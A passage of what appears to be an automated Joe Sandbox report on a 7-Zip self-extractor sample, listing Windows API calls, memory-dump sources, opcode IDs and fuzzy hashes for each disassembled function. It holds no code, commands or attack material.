                                                                                          Similarity
                                                                                          • API ID: ??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1033339047-0
                                                                                          • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                                          • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                                          • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                                          • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                                          • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                                          • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                                          • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                                          • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                                          • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                                          • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                                          APIs
                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1263568516-0
                                                                                          • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                                          • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                                                          • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                                          • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09
                                                                                          APIs
                                                                                          • _wtol.MSVCRT ref: 00403882
                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                                          • _wtol.MSVCRT ref: 00403A1C
                                                                                          • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 408529070-24824748
                                                                                          • Opcode ID: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                                          • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                                          • Opcode Fuzzy Hash: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                                          • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                                          • wsprintfW.USER32 ref: 004021E7
                                                                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                                          • GetLastError.KERNEL32 ref: 00402201
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                                          • GetLastError.KERNEL32 ref: 00402236
                                                                                          • lstrcmpiW.KERNEL32(00AA9848,00404926), ref: 0040224B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00AA9848), ref: 0040225B
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                                          • SetLastError.KERNEL32(?), ref: 00402282
                                                                                          • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                                          • _wtol.MSVCRT ref: 00402314
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00AA9848,00000002), ref: 00402334
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                          • String ID: 7zSfxString%d
                                                                                          • API String ID: 2117570002-3906403175
                                                                                          • Opcode ID: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                                          • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                                          • Opcode Fuzzy Hash: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                                          • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                                          • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                                          • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                                          • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                                          • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                                          • wsprintfW.USER32 ref: 00401E7F
                                                                                          • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                          • API String ID: 2639302590-365843014
                                                                                          • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                                          • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                                          • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                                          • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                                          APIs
                                                                                          • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                                          • GetLastError.KERNEL32 ref: 00408DF4
                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                                          • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                                          • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                                          • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 829399097-0
                                                                                          • Opcode ID: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                                          • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                                                          • Opcode Fuzzy Hash: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                                          • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                                          • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                                          • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                                          • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                                          • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                          • String ID:
                                                                                          • API String ID: 1862581289-0
                                                                                          • Opcode ID: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                                          • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                                          • Opcode Fuzzy Hash: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                                          • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                                          • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                                          • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                                          • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentHookThreadWindows$Dialog
                                                                                          • String ID:
                                                                                          • API String ID: 1967849563-0
                                                                                          • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                                          • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                                          • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                                          • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                                          APIs
                                                                                          • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                                          • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                          • String ID:
                                                                                          • API String ID: 3429775523-0
                                                                                          • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                                          • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                                          • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                                          • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                                          • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                                          • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                                          • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                                          • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                                          • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                                          • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                                          • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                                          • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                                          • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                          • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                                          • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                          • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                          • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                                          • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                          • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                                                          APIs
                                                                                          • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
